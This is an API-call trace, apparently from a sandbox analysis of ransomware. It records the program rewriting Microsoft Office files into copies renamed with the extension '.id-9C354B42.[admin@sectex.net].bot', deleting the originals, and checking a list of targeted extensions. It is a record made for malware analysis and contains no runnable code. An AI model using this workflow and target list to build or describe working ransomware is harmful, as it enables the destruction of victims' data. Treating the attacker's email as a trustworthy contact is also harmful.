	[0154.166] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0154.166] GetLastError () returned 0x0
	[0154.166] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1a780, lpOverlapped=0x0) returned 1
	[0154.170] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1a790, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1a790, lpOverlapped=0x0) returned 1
	[0154.172] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.172] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf8, lpOverlapped=0x0) returned 1
	[0154.173] SetEndOfFile (hFile=0x3ac) returned 1
	[0154.173] CloseHandle (hObject=0x3ac) returned 1
	[0154.173] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.173] SetEndOfFile (hFile=0x3dc) returned 1
	[0154.176] CloseHandle (hObject=0x3dc) returned 1
	[0154.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.dll.idx_dll")) returned 1
	[0154.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.177] lstrlenW (lpString=".doc") returned 4
	[0154.177] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.177] lstrlenW (lpString=".docx") returned 5
	[0154.177] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.177] lstrlenW (lpString=".pdf") returned 4
	[0154.177] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.177] lstrlenW (lpString=".xls") returned 4
	[0154.177] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.177] lstrlenW (lpString=".xlsx") returned 5
	[0154.178] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.178] lstrlenW (lpString=".ppt") returned 4
	[0154.178] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString=".zip") returned 4
	[0154.178] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString=".rar") returned 4
	[0154.178] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString=".bz2") returned 4
	[0154.178] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString=".7z") returned 3
	[0154.178] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString=".dbf") returned 4
	[0154.178] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString=".1cd") returned 4
	[0154.178] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString=".jpg") returned 4
	[0154.178] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.178] lstrlenW (lpString=".doc") returned 4
	[0154.178] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.178] lstrlenW (lpString=".docx") returned 5
	[0154.178] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.178] lstrlenW (lpString=".pdf") returned 4
	[0154.178] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString=".xls") returned 4
	[0154.179] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString=".xlsx") returned 5
	[0154.179] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.179] lstrlenW (lpString=".ppt") returned 4
	[0154.179] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.179] lstrlenW (lpString=".zip") returned 4
	[0154.179] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString=".rar") returned 4
	[0154.179] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString=".bz2") returned 4
	[0154.179] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString=".7z") returned 3
	[0154.179] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.179] lstrlenW (lpString=".dbf") returned 4
	[0154.179] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.179] lstrlenW (lpString=".1cd") returned 4
	[0154.179] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.DLL.IDX_DLL") returned 66
	[0154.179] lstrlenW (lpString=".jpg") returned 4
	[0154.179] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.179] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0154.179] lstrlenW (lpString="WWINTL.REST.IDX_DLL") returned 19
	[0154.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.180] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=614784) returned 1
	[0154.180] CloseHandle (hObject=0x3dc) returned 1
	[0154.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll")) returned 0x20
	[0154.180] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc
	[0154.180] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.181] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0154.181] GetLastError () returned 0x0
	[0154.181] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x96180, lpOverlapped=0x0) returned 1
	[0154.459] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x96190, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x96190, lpOverlapped=0x0) returned 1
	[0154.470] ReadFile (in: hFile=0x3dc, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.470] WriteFile (in: hFile=0x3ac, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0154.470] SetEndOfFile (hFile=0x3ac) returned 1
	[0154.481] CloseHandle (hObject=0x3ac) returned 1
	[0154.481] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.481] SetEndOfFile (hFile=0x3dc) returned 1
	[0154.769] CloseHandle (hObject=0x3dc) returned 1
	[0154.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.808] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\wwintl.rest.idx_dll")) returned 1
	[0154.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.808] lstrlenW (lpString=".doc") returned 4
	[0154.808] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".docx") returned 5
	[0154.809] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.809] lstrlenW (lpString=".pdf") returned 4
	[0154.809] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".xls") returned 4
	[0154.809] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".xlsx") returned 5
	[0154.809] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.809] lstrlenW (lpString=".ppt") returned 4
	[0154.809] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.809] lstrlenW (lpString=".zip") returned 4
	[0154.809] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".rar") returned 4
	[0154.809] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".bz2") returned 4
	[0154.809] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString=".7z") returned 3
	[0154.809] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.809] lstrlenW (lpString=".dbf") returned 4
	[0154.809] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.809] lstrlenW (lpString=".1cd") returned 4
	[0154.809] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.809] lstrlenW (lpString=".jpg") returned 4
	[0154.809] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.810] lstrlenW (lpString=".doc") returned 4
	[0154.810] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".docx") returned 5
	[0154.810] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0154.810] lstrlenW (lpString=".pdf") returned 4
	[0154.810] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".xls") returned 4
	[0154.810] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".xlsx") returned 5
	[0154.810] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0154.810] lstrlenW (lpString=".ppt") returned 4
	[0154.810] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.810] lstrlenW (lpString=".zip") returned 4
	[0154.810] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".rar") returned 4
	[0154.810] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".bz2") returned 4
	[0154.810] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString=".7z") returned 3
	[0154.810] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0154.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.810] lstrlenW (lpString=".dbf") returned 4
	[0154.810] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.810] lstrlenW (lpString=".1cd") returned 4
	[0154.810] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0154.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WWINTL.REST.IDX_DLL") returned 67
	[0154.810] lstrlenW (lpString=".jpg") returned 4
	[0154.810] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0154.811] lstrcmpiW (lpString1=".ACL", lpString2=".bot") returned -1
	[0154.811] lstrlenW (lpString="MSO.ACL") returned 7
	[0154.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0154.811] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=50556) returned 1
	[0154.811] CloseHandle (hObject=0x3d0) returned 1
	[0154.811] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl")) returned 0x20
	[0154.811] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0154.812] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.812] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0155.788] GetLastError () returned 0x0
	[0155.788] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xc57c, lpOverlapped=0x0) returned 1
	[0155.837] WriteFile (in: hFile=0x1b8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xc580, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xc580, lpOverlapped=0x0) returned 1
	[0155.839] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.839] WriteFile (in: hFile=0x1b8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0155.839] SetEndOfFile (hFile=0x1b8) returned 1
	[0155.839] CloseHandle (hObject=0x1b8) returned 1
	[0155.839] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.839] SetEndOfFile (hFile=0x3d0) returned 1
	[0155.844] CloseHandle (hObject=0x3d0) returned 1
	[0155.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl")) returned 1
	[0155.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.845] lstrlenW (lpString=".doc") returned 4
	[0155.845] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0155.845] lstrlenW (lpString=".docx") returned 5
	[0155.845] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0155.846] lstrlenW (lpString=".pdf") returned 4
	[0155.846] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString=".xls") returned 4
	[0155.846] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString=".xlsx") returned 5
	[0155.846] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0155.846] lstrlenW (lpString=".ppt") returned 4
	[0155.846] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString=".zip") returned 4
	[0155.846] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString=".rar") returned 4
	[0155.846] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString=".bz2") returned 4
	[0155.846] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString=".7z") returned 3
	[0155.846] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString=".dbf") returned 4
	[0155.846] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString=".1cd") returned 4
	[0155.846] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString=".jpg") returned 4
	[0155.846] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.846] lstrlenW (lpString=".doc") returned 4
	[0155.846] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".docx") returned 5
	[0155.847] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0155.847] lstrlenW (lpString=".pdf") returned 4
	[0155.847] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".xls") returned 4
	[0155.847] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".xlsx") returned 5
	[0155.847] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0155.847] lstrlenW (lpString=".ppt") returned 4
	[0155.847] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.847] lstrlenW (lpString=".zip") returned 4
	[0155.847] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".rar") returned 4
	[0155.847] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".bz2") returned 4
	[0155.847] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString=".7z") returned 3
	[0155.847] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0155.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.847] lstrlenW (lpString=".dbf") returned 4
	[0155.847] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0155.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.847] lstrlenW (lpString=".1cd") returned 4
	[0155.847] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0155.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned 55
	[0155.847] lstrlenW (lpString=".jpg") returned 4
	[0155.847] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0155.847] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0155.848] lstrlenW (lpString="ColleagueImport.dll") returned 19
	[0155.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\colleagueimport.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.858] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=95104) returned 1
	[0155.858] CloseHandle (hObject=0x39c) returned 1
	[0155.858] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\colleagueimport.dll")) returned 0x20
	[0155.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\colleagueimport.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll" (normalized: "c:\\program files\\microsoft office\\office14\\addins\\colleagueimport.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0155.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.914] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ADDINS\\ColleagueImport.dll") returned 69
	[0155.914] lstrlenW (lpString=".doc") returned 4
	[0155.914] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0155.914] lstrlenW (lpString=".docx") returned 5
	[0155.914] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0155.914] lstrlenW (lpString=".pdf") returned 4
	[0155.915] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0155.915] lstrlenW (lpString=".xls") returned 4
